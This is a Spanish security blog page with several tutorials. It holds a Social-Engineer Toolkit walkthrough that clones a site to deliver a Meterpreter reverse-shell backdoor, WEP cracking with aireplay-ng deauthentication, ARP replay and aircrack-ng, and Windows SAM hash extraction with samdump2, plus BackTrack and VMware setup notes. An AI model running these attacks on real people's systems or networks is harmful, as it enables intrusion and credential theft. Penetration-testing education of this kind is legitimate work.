Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Vector de Ataque Web con Social-Engineer Toolkit (SET)

Social-Engineer Toolkit (SET) es un conjunto de colección de scripts en Python especialmente diseñadas para realizar ataques de ingeniería social en procesos de auditorias de seguridad. Esta herramienta fue creada por David Kennedy (ReL1K), el mismo creador de otra herramienta muy popular llamada Fast-Track, que también es una herramienta que automatiza algunos ataques más comunes y más usados en las pruebas de penetración (penetration test) mediante algunos scripts hechos en Python.

Social-Engineer Toolkit (SET) nos permite crear archivos PDF, sitios web falsos y enviar correos electrónicos con código malicioso incrustado, por cierto también se integra con el Metasploit Framework.

Como bien sabran y se han dado cuenta, la ingeniería social no es nada nuevo, los ataques de ingeniería social están ahora en su punto más alto, es decir en pleno auge y siempre han sido un gran riesgo para muchas organizaciones. Una persona que esta tratando de convencer a otras personas para que realicen actos que normalmente no harian es muy antigua como la misma historia de la tierra :D

Muchos creen que la ingeniería social es uno de los mayores riesgos que enfrentan las organizaciones actualmente, ya que es muy difícil proteger a las organizaciones de estos ataques. Por ejemplo puede que se acuerden del ataque a Google, del llamado “Operación Aurora” (también conocida como Comele o Hydraq) en el que la técnica de ingeniería social fue utilizada para atacar a Gmail y otras fuentes de Google.

Un vector de ataque es la vía que se utiliza para obtener información o acceso a un determinado sistema y la herramienta Social-Engineer Toolkit (SET) clasifica a los ataques por vectores de ataques web, correo, electrónico y también los ataques basados en USB. Utiliza correo electrónico, sitios web falso y otros vectores que típicamente lo que hacen es engañar a los usuarios a comprometer la información sensible. Cada vector puede tener éxito o todo lo contrario, dependiendo del objetivo a atacar y también el tipo de comunicación utilizada. SET también viene con correos electrónicos y plantillas de páginas web ya predefinidas que pueden ser utilizadas para los ataques de ingeniería social, también utiliza la herramienta Metasploit Framework. Así que en este post se mostrara un ejemplo de vector de ataque basado en web, manos a la obra y listos para la primera prueba.

Herramientas Utilizadas

Instalación de Social Engineer Toolkit (SET)

La instalación de SET es sencilla, lo que necesitamos es tener instalado Phyton y Metasploit Framework, ambas herramientas están instaladas en la distribución de BackTrack y no hay que preocuparnos por nada sobre cosas de la configuración e instalación, solo tenemos que tener actualizados a las versiones más recientes. Pero si requieren instalarlo en alguna otra distribución diferente, solo abrir la consola y teclear o copiar el siguiente comando.
svn co https://svn.secmaniac.com/social_engineering_toolkit set/
Después de ejecutar el comando anterior, tendremos un nuevo directorio que contiene todas herramientas necesarias para la ejecución de Social-Engineer Toolkit (SET).

Ejecutando Social-Engineer Toolkit (SET)

Para ejecutar SET es un proceso sencillo, ya que solo tenemos que abrir una terminal o consola y simplemente tenemos que teclear ./set. Bueno lo primero tenemos que estar en el directorio donde tenemos la herramienta, en BackTrack se encuentra en el directorio /pentest/exploits/set/. Lo haremos de la siguiente manera.
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ls
config modules readme reports set set-automate set-proxy set-update setup.py set-web src
root@bt:/pentest/exploits/set# ./set
Ejecución de Social-Engineer Toolkit (SET).

El comando ./set inicia la ejecución de SET y nos muestra el menú inicial. En este post veremos un ejemplo de un vector de ataque basado en web, clonando un sitio web y utilizando el método de ataque de Java Applet.

Website Attack Vectors

Los vectores de ataque web son probablemente uno de los aspectos más avanzados e interesantes de esta herramienta ya que están especialmente diseñados para ser de un aspecto muy creíble y de una apariencia muy atractiva para la víctima. Esta herramienta puede clonar sitios web que son idénticos a los sitios de confianza que normalmente visita un usuario normal, esto asegura a la víctima de que aparentemente está visitando un sitio legítimo.

Java Applet Attack

Uno de los ataques basados en un sitio web que tienes disponible Social-Engineer Toolkit (SET), es el ataque de Java Applet (Java Applet Attack), es uno de los vectores de ataque más exitoso de esta herramienta. Este ataque malicioso lo que hace es mostrar un applet de Java en el navegador web invitando a que el usuario de clic, en este caso a ejecutar el applet. Este ataque no se considera una vulnerabilidad de Java.

Para ejecutar este ataque en el menú principal de SET debemos primero elegir la opción 2, Website Attack Vectors. Al elegir la esta opción, nos mostrara en consola las siguientes opciones.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate

Java Applet Attack Method

Elegimos la opción 1, Java Applet Attack Method y nos mostrara lo siguiente.


Elegimos la opción que 1 o 2, en mi caso la opción 2 donde pongo el sitio a clonar, en mi caso puse mi blog, delfirosales.blogspot.com y se generara la clonación del sitio.

Hemos creado un servidor de alojamiento con un sitio web clonado en este caso, el sitio es mi blog delfirosales.blogspot.com.
En el siguiente paso dependiendo del escenario u objetivo elegimos la opción adecuada, en mi caso realice la prueba con la opción 2, Windows Reverse_TCP Meterpreter.


Después elegimos el backdoor, en mi caso elegí la opción 16, Backdoored Executable (BEST), elegimos el puerto, esperamos a que se genere la configuración y esperamos a que cargue Metasploit Framework.


Ahora que tenemos todo listo, solo tenemos que tener un objetivo a atacar para que navegue a través del sitio malicioso. Al llegar a la pagina web, la victima se le mostrar una advertencia pop-up tal como se muestra en la siguiente figura.


Si la victima da clic en Ejecutar (que por cierto la mayoría de los usuarios la hacen) el exploit será ejecutado y con esto tendremos acceso y el control total del sistema de la victima, en este caso la maquina con Windows XP SP3, tal y como se muestran en las siguientes imágenes.


De vuelta en nuestro equipo atacante, la sesión de Meterpreter se ha establecido correctamente y ahora tenemos el acceso a la maquina de la victima, tal como se muestra.


Referencias:
Computer Based Social Engineering Tools: Social Engineer Toolkit (SET)
Social Engineering: The Art of Human Hacking
Penetration Tester's Open Source Toolkit, Third Edition

SIOCSIFFLAGS: Unknown error 132 - para RTL8187 en BackTrack 5

Solucion al error SIOCSIFFLAGS: Unknown error 132 en chipset rt1887.


Los chipset rtl8187 en BackTrack 5 desde VMware al hacer
root@delfi:~# ifconfig wlan1 up
SIOCSIFFLAGS: Unknown error 132
el fastidioso SIOCSIFFLAGS, bueno aquí esta la solución al "SIOCSIFFLAGS: Unknown error 132". Abrimos consola.
rmmod rtl8187
rmmod mac80211
modprobe rtl8187
ifconfig wlan0 up
y ya con eso, tenemos el rtl8187 que se puede levantar con la orden ifconfig.
root@delfi:~# ifconfig wlan0 up
root@delfi:~#
y ya no da errores :)

Esto también se puede realizar copiando lo siguiente en un archivo de texto y guardarlo en alguna ubicación de nuestro disco duro con cualquier nombre, en mi caso rtl8187.
#!/bin/bash
echo Removiendo Modulo RTL8187
rmmod rtl8187
echo Removiendo Modulo MAC80211
rmmod mac80211
echo Agregando Modulo RTL8187
modprobe rtl8187
echo wlan0 up
ifconfig wlan0 up
Abrimos consola y nos vamos a la dirección donde tenemos ubicado el archivo y tecleamos.

chmod 755 rlt8187
./rtl8187

y listo, una imagen dice mas que mil palabras :)

Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

En este post veremos como se obtiene la clave WEP de una red inalambrica con un cliente conectado. Para este escenario realizamos dos ataques. El primero sera el ataque 0 o bien la deautenticación que consiste en deautenticar al cliente conectado al Punto de Acceso. El segundo lanzaremos el Ataque 3: Reinyección de una petición ARP (ARP-request) para generar nuevos IVs (vectores de inicialización).

Lo primero es poner la tarjeta en modo monitor.

root@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
(monitor mode enabled on mon0)

root@bt:~#
Una vez puesto la tarjeta en modo monitor con airmon-ng. Ahora toca lanzar la herramienta airodump-ng buscar las redes wifi disponibles. Para esto tecleamos el siguiente comando en consola.

root@bt:~# airodump-ng mon0
CH  8 ][ Elapsed: 0 s ][ 2011-03-18 02:21

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:18:85:C9    5        1        2    0   6  54 . WEP  WEP         WifiAttack

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:18:85:C9  0C:60:76:71:D5:5B    1   54 -54      0        2

root@bt:~#
Como podemos ver tenemos una red disponible y también hay un cliente conectado a dicha red. Ahora lanzamos airodump-ng para que escuche todo el trafico de la red con el nombre de "WifiAttack".

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

Ataque 0: Deautenticación

Ahora toca lanzar el ataque 0 para deautenticar al cliente conectado a la red "WifiAttack". El cliente tiene la direccion MAC 0C:60:76:71:D5:5B. Para esto lanzamos el siguiente comando.

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0
02:27:39  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
02:27:39  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [34|63 ACKs]
02:27:40  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [17|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:42  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [13|63 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [22|65 ACKs]
02:27:44  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [18|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [16|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [14|64 ACKs]
root@bt:~#
El numero 10 es el número de deautenticaciones a enviar. Una vez desasociado el cliente lanzamos el ataque 3 para generar nuevos IVs (vectores de inicialización).

Ataque 3: ARP-Request

Lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0
The interface MAC (00:C0:CA:4A:82:97) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 0C:60:76:71:D5:5B
02:28:07  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Saving ARP requests in replay_arp-0318-022807.cap
You should also start airodump-ng to capture replies.
Read 81421 packets (got 27178 ARP requests and 26333 ACKs), sent 29719 packets...(49
root@bt:~#
Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

Cuando ya tengamos suficientes paquetes de datos (#Data) lanzamos aircrack-ng para crackear la Clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 86840 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  WifiAttack                WEP (19315 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 19477 ivs.

                                  Aircrack-ng 1.1 r1738

                     [00:00:00] Tested 4 keys (got 19189 IVs)

 KB    depth   byte(vote)
 0    0/  1    76(26624) 1E(26112) 4D(25088) E6(24576) A5(24064) 25(23808) 36(23808
 1    0/  2    53(26368) 78(26112) 92(24832) BD(24320) 1A(23808) 0B(23552) 59(23552
 2    0/  2    95(25856) C1(25856) 3E(25088) BB(24064) DD(24064) BF(23296) ED(23296
 3    0/  1    92(27392) 40(25088) 08(24576) 45(23808) 8F(23808) 20(23296) 97(23296
 4    0/  1    80(27392) F2(26112) 46(24832) 4D(24576) 71(24576) 0E(24320) 85(24064

                       KEY FOUND! [ 76:02:95:92:80 ]
       Decrypted correctly: 100%
Después de tener algunos problemas con la instalación de Wifiway 2.0.1 en VMware, principalmente problemas con el GRUB, al fin he logrado instalarlo. La solución la encontré en este post del foro Seguridad Wireless, el detalle es tener que hacer las particiones utilizando cfdisk de Wifiway 1.0 final.

Por si alguien no sabe como instalarlo o tiene algunos problemas en la instalación de Wifiway, he realizado este vídeo. El vídeo muestra como instalar Wifiway 2.0.1 en VMware Workstation específicamente en la versión 7.1.2 build-301548.

En resumen, los pasos para instalar Wifiway 2.0.1, tal como lo menciona el usuario wepain, son los siguiente.
  1. Iniciar con LiveCD Wifiway 1.0 Final
  2. Escribir cfdisk /dev/tudiscoduroaqui
  3. Crear la partición linux y la partición swap
  4. Escribir en la tabla de particiones
  5. Ejecutar mkfs -t ext3 /dev/tuparticionwifiway
  6. Ejecutar mkswap /dev/tuparticionswap
  7. Ejecutar poweroff -f
  8. Iniciar con LiveCD WifiWay 2.0.1
  9. Instalar wifiway
  10. Configurar grub y el error ya no aparece.
Herramientas
  • Wifiway 1.0 final
  • Wifiway 2.0.1
  • VMware Workstation
VMware Workstation 7.1.2 build-301548
http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0
Para descargar Wifiway 2.0.1 existen 2 alternativas, una LiveCD normal y una versión compacta para los equipos con menos capacidad, así que descargar la versión que mejor se adapte a sus caracteristicas.

Comandos

wifiway ~ # startx
wifiway ~ # fdisk -l
wifiway ~ # cfdisk /dev/sda
wifiway ~ # fdisk -l
wifiway ~ # mkfs -t ext3 /dev/sda2
wifiway ~ # mkswap /dev/sda5
wifiway ~ # poweroff
Una vez instalado, iniciar sesión con los siguientes comandos.
wifiway login: root
Password: toor
wifiway ~ # startx
Video Online
http://www.youtube.com/watch?v=k4cXtocnWFQ

Este vídeo muestra como instalar un conjunto de controladores y aplicaciones llamadas "VMware Tools" que aceleran notablemente el rendimiento de la maquina virtual es por eso muy importante instalar estas herramientas de VMware en el sistema virtualizado. Aquí se muestran los pasos para instalar los VMware Tools en BackTrack 4 r2, la version utilizada de VMware Workstation es la versión 7.1.2 build-301548.

Para instalar los VMware Tools solo tienes que localizarte en la carpeta donde los hallas descomprimido y ejecutar el siguiente comando.
./vmware-install.pl
En mi caso /root/vmware-tools-distrib
root@bt:~/vmware-tools-distrib# ./vmware-install.pl

Video Online
http://www.youtube.com/watch?v=GSiftUkH-Jw
Este vídeo muestra como instalar BackTrack 4 R2 en VMware Workstation, así como actualizarlo y alguno que otro ajuste mas. Estos pasos mostrados en este vídeo también puede ser de utilidad para instalar BackTrack en una maquina real.

Herramientas Utilizadas
  • BackTrack
  • VMware Workstation
BackTrack 4 R2 (bt4-r2.iso)
http://www.backtrack-linux.org/downloads/
VMware Workstation 7.1.2 build-301548
http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0

Comandos
root@bt:~# startx
root@bt:~# xrandr -s 1280x720 (comando opcional, es para aumentar la resolución de la pantalla)
bt login: root
Password: toor
root@bt:~# startx
root@bt:~# iwconfig
root@bt:~# dhclient eth0
root@bt:~# apt-get update
Video Online
http://www.youtube.com/watch?v=m038Ss07n-c

En este vídeo se muestra como crackear una contraseña en un sistema windows apagado o de igual manera puede servir con tener la imagen de dicho sistema. En resumen para crackear las contraseñas de Windows desde una imagen o partición debe cumplirse tres tareas principales.
  1. Obtener el Syskey (System key)
  2. Extraer los hashes del archivo SAM
  3. Crackear los hashes para determinar las contraseñas asociada
Video Online
http://www.youtube.com/watch?v=lK8GX_7Bek8

Herramientas
Comandos
root@bt:~# fdisk -l
root@bt:~# mkdir /mnt/windows
root@bt:~# mount /dev/hda1 /mnt/windows
root@bt:~# mount -t ntfs-3g /dev/sda1 /mnt/usb -o force
root@bt:~# cd /mnt/windows/WINDOWS/system32/config/
root@bt:/mnt/windows/WINDOWS/system32/config/# ls
root@bt:/mnt/windows/WINDOWS/system32/config/# cp SAM /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cp system /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cd /mnt/usb
root@bt:/mnt/usb# bkhive system key
root@bt:/mnt/usb# samdump2 ./system ./SAM > /mnt/usb/hashes.txt
root@bt:/mnt/usb# cat ./hashes.txt
root@bt:/mnt/usb# poweroff
En este video se muestra la solución al error lanzado en vmware sobre el driver rtl8187.
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132

 (monitor mode enabled on mon0)

Video Solucion: Backtrack mode Monitor rtl8187 - SIOCSIFFLAGS: Unknown error 132


El archivo "blacklist" debe quedar de la siguiente manera
# This file lists those modules which we don't want to be loaded by
# alias expansion, usually so some other driver will be loaded for the
# device instead.

# evbug is a debug tool that should be loaded explicitly
blacklist evbug
blacklist pcspkr

# these drivers are very simple, the HID drivers are usually preferred
blacklist usbmouse
blacklist usbkbd

# replaced by e100
blacklist eepro100

# replaced by tulip
blacklist de4x5

# causes no end of confusion by creating unexpected network interfaces
blacklist eth1394

# snd_intel8x0m can interfere with snd_intel8x0, doesn't seem to support much
# hardware on its own (Ubuntu bug #2011, #6810)
blacklist snd_intel8x0m

# Conflicts with dvb driver (which is better for handling this device)
blacklist snd_aw2

# causes failure to suspend on HP compaq nc6000 (Ubuntu: #10306)
blacklist i2c_i801

# replaced by p54pci
blacklist prism54

# replaced by b43 and ssb.
blacklist bcm43xx

# most apps now use garmin usb driver directly (Ubuntu: #114565)
blacklist garmin_gps

# replaced by asus-laptop (Ubuntu: #184721)
blacklist asus_acpi

# low-quality, just noise when being used for sound playback, causes
# hangs at desktop session start (Ubuntu: #246969)
blacklist snd_pcsp
blacklist rt73
blacklist ath_pci
#blacklist r8187
blacklist rt3070sta
blacklist rt2870sta
blacklist arusb_lnx
blacklist ath_pci
#blacklist r8187
blacklist rt73
blacklist rtl8187
Archivo "blacklist" localizado en /etc/modprobe.d/blacklist

Backtrack 4 - Error rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132

En algunas pruebas realizadas en VMware me encontré que el controlador rtl8187 se comportaba de una forma extraña, ya que al lanzar airmon-ng para poner la tarjeta en modo monitor lanzaba el siguiente error.
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132

            (monitor mode enabled on mon0)
Solución
Buscando en google me encontré con la siguiente solución. Tecleamos en consola lo siguiente.

root@bt:~# rmmod rtl8187
root@bt:~# rmmod mac80211
root@bt:~# modprobe r8187


Para que los cambios sean permanentes debemos de modificar el archivo "blacklist" que se encuentra en la siguiente ruta.

/etc/modprobe.d/blacklist

Abrimos el archivo "blacklist", comentamos el driver r8187.

#blacklist r8187

Debe de quedar de la siguiente manera.


#blacklist r8187
blacklist rtl8187


Video On-line:
http://www.youtube.com/watch?v=CjcbkhBXqz0

Referencia:
http://www.backtrack-linux.org/forums/backtrack-howtos/31403-howto-rtl8187-backtrack-r1-monitor-mode-unknown-error-132-a.html

Instalación de Firefox 3.5 en Backtrack 4 Pre final

Ubuntuzilla es un script hecho en Phython que nos permite instalar las últimas versiones de Firefox, SeaMonkey y Thunderbird en Ubuntu y como Backtrack 4 pre Final se basa en Intrepid Ibex podemos instalar firefoz 3.5 a travez de este script.

Ademas tiene las siguientes ventajas:
  • Nos deja escoger el idioma al momento de la instalación
  • Pone el Firefox 3.5 como nuestro navegador por defecto
  • Integra todos los plugins que tengas instalados.
  • Detecta automáticamente las últimas versiones de Firefox, Thunderbird y Seamonkey de los servidores de Mozilla
  • Verifica la autenticidad de la firma GPG de Firefox y Thunderbird, para evitar paquetes corruptos o peligrosos.
  • Hace un respaldo con fecha de los perfiles de Firefox, Seamonkey y Thunderbird
  • Puedes desinstalar las aplicaciones y todo quedará como en el momento que las instalaste.
  • Se actualiza automáticamente.
Asi que vamos a ver como instalarlo en nuestro backtrack 4 pre Final siguiendo los siguientes pasos.

Descargamos el instalador Ubuntuzilla desde Sourceforge y pasamos a instalarlo utilizando dpkg y apt-get para resolver las dependencias (ignorar las advertencias mientras se ejecuta dpkg).

# wget http://downloads.sourceforge.net/sourceforge/ubuntuzilla/ubuntuzilla-4.6.1-0ubuntu1-i386.deb?use_mirror=surfnet
# dpkg -i ubuntuzilla-4.6.1-0ubuntu1-i386.deb
# apt-get install -f




En esta seccion #Do you want to continue [Y/n]?# tecleamos una y.


Una vez hecho lo anterior pasamos a instalar la ultima version de firefox haciendo en consola lo siguiente.

# ubuntuzilla.py -a install -p firefox


Tecleamos una "y" para proceder con la instalacion de firefox.

En el siguiente paso nos mostrara una lista para elegir la localización (idioma) para Firefox. En mi caso tecleo 19.



You have chosen localization es-MX. Is that correct [y/n]? Please enter 'y' or 'n':

Nos pregunta si estamos en lo correcto en nuestra eleccion, le decimos que si tecleando la letra "y". Hecho lo anterior pasara a descargarse firefox.



Al finalizar la descarga automáticamente empezara la instalación de firefox y nos preguntara si nos gustaría activar la funcion que comprobará regularmente actualizaciones para Firefox. Solo tecleamos una "y" para activar la funcion.



Con esto terminamos la instalación de firefox totalmente actualizado y en nuestro idioma.



Si queremos remover el proceso por alguna razon, solo hacemos lo siguiente.

# ubuntuzilla.py -a remove -p firefox

Referencias:
http://sourceforge.net/apps/mediawiki/ubuntuzilla/index.php?title=Main_Page

Intalar VMware Tools en BackTrack 4 (pre) Final

Es muy importante instalar las herramientas de VMware en el sistema virtualizado ya que estas nos permitiran mejorar el uso y rendimiento del sistema. Para instalar estas herramientas en Backtrack 4 (pre) Final sigue los siguientes pasos.

Una vez iniciado Backtrack nos dirigimos al menú VM de VMware Workstation y hacemos clic en Install VMware Tools...

Abrimos una consola y tecleamos.

mkdir /mnt/cdrom
mount /dev/cdrom3 /mnt/cdrom
cp -rf /mnt/cdrom/VMwareTools-8.1.3-203739.tar.gz /tmp/
cd /tmp/
tar zxpf VMwareTools-8.1.3-203739.tar.gz
cd vmware-tools-distrib
./vmware-install.pl

Una vez hecho lo anterior, ya tendremos instalados las herramientas de VMware.




Video - Instalación de VMware Tools en BackTrack 4 R2
http://delfirosales.blogspot.com/2011/02/video-instalacion-de-vmware-tools-en.html

Instalación de BackTrack 4 en VMware Workstatsion 7

A continuación voy a tomar los pasos que realice para instalar backtrack 4 en VMware Workstation, que se ejecuta desde un Windows Vista. He utilizado la versión 7.0.0-203739 de VMware Workstation (debería funcionar con la versiones anteriores).

Lo primero es descargarnos BackTrack 4 (bt4-pre-final.iso) desde el sitio oficial de remote-exploit. El archivo viene en formato ISO. Guarde el archivo en su disco duro y una vez descargado sigue los siguientes pasos.
  • Iniciar VMware Workstation y nos vamos a al menu File > New > Virtual Machine...
  • Seleccionamos instalación Tipica (Typical).
  • Seleccionamos la opción Installer Disc image file (iso).
  • Damos clic en el botón Browse... para buscar la imagen ISO que descargamos anteriormente.
  • Hecho lo anterior damos clic en Next y Seleccionamos Linux para la versión de Ubuntu.
  • Damos clic en Next y seleccionamos la ubicación donde sera instalado la maquina virtual.
  • Dejamos los valores por defecto (Maximum disk size 8GB y Store Virtual disk as a single file).
  • Damos clic en Next y Finalizar.
  • Nos vamos a la opción Edit virtual machine settings y cambiamos el adaptador de red (Networ Adapter) a Bridged.
  • Ahora iniciamos la maquina virtual dando clic en Power on the virtual machine.
Automáticamente iniciara el Live CD desde la imagen ISO que nos dará varios opciones de arranque. Seleccionamos la primera opción (BackTrack Framebuffer 1024×768) como se muestra en la siguiente imagen.













Después del arranque nos mostrara una linea de comandos root@bt:~#. Solo tenemos que teclear startx.













Esto iniciara la interfaz gráfica de Backtrack. Sin embargo se estará ejecutando desde el Live CD así que si hacemos unos cambios todos estos se perderán en el próximo reinicio. Por lo tanto es necesario instalar el sistema en el disco virtual de vmaware y para esto seguir con los siguientes pasos.

Damos clic en install.sh localizado en el escritorio. Si no se encuentra en el escritorio abrimos la consola y tecleamos

root@bt:~#ubiquity














Esto iniciara el procedimiento de instalación y para continuar solo hacemos clic en Continue anyway.

En el siguiente paso seleccionamos la región donde nos encontramos. Podemos hacer clis en el zoom del mapa para seleccionar el lugar con mas facilidad y hacer clic en Forward.

En el siguiente paso seleccionamos la configuración correcta de nuestro teclado, esto nos garantizara de que todas las teclas deben funcionar correctamente.

Podemos seleccionar nuestro país en la lista para seleccionar el modelo de teclado, también podemos utilizar el recuadro de la parte inferior de la ventana para comprar que funcionan todas las teclas de nuestro teclado. Una vez configurado el teclado damos clic en Forward ara continuar con la instalación.


En el siguiente paso seleccionamos la opción "Guided - use entire disk" y damos clic en forward.














El siguiente paso es añadir algunos datos acerca de nosotros que se utilizara para crear una cuenta de usuario en el equipo, y esta cuenta de usuario se utiliza como el principal administrador del sistema. Una vez tecleado los datos damos clic en Forward para continuar.














En el siguiente paso nos mostrara la siguiente ventana, donde nos muestra el resumen de las opciones que realizamos, revisamos y confirmamos las opciones haciendo clic en install.














Y automáticamente empezara la instalación del sistema copiando todos los archivos al disco duro.














Al terminar la instalación, nos pedirá que reiniciemos la maquina y hacemos clic en Restart Now.














Después de reiniciar, ahora iniciara desde el disco de VMware y no desde el CD Live. En el inicio de sesión del sistema debemos escriba el nombre de usuario y la contraseña que tecleamos. En mi caso delfi.



















Si queremos trabajar con el usuario root, borramos la cuenta creada e iniciamos la interfaz gráfica.


y listo! Backtrack instalado!














Video - Instalar BackTrack 4 R2 en VMware Workstation

http://delfirosales.blogspot.com/2011/02/instalar-backtrack-4-r2-en-vmware.html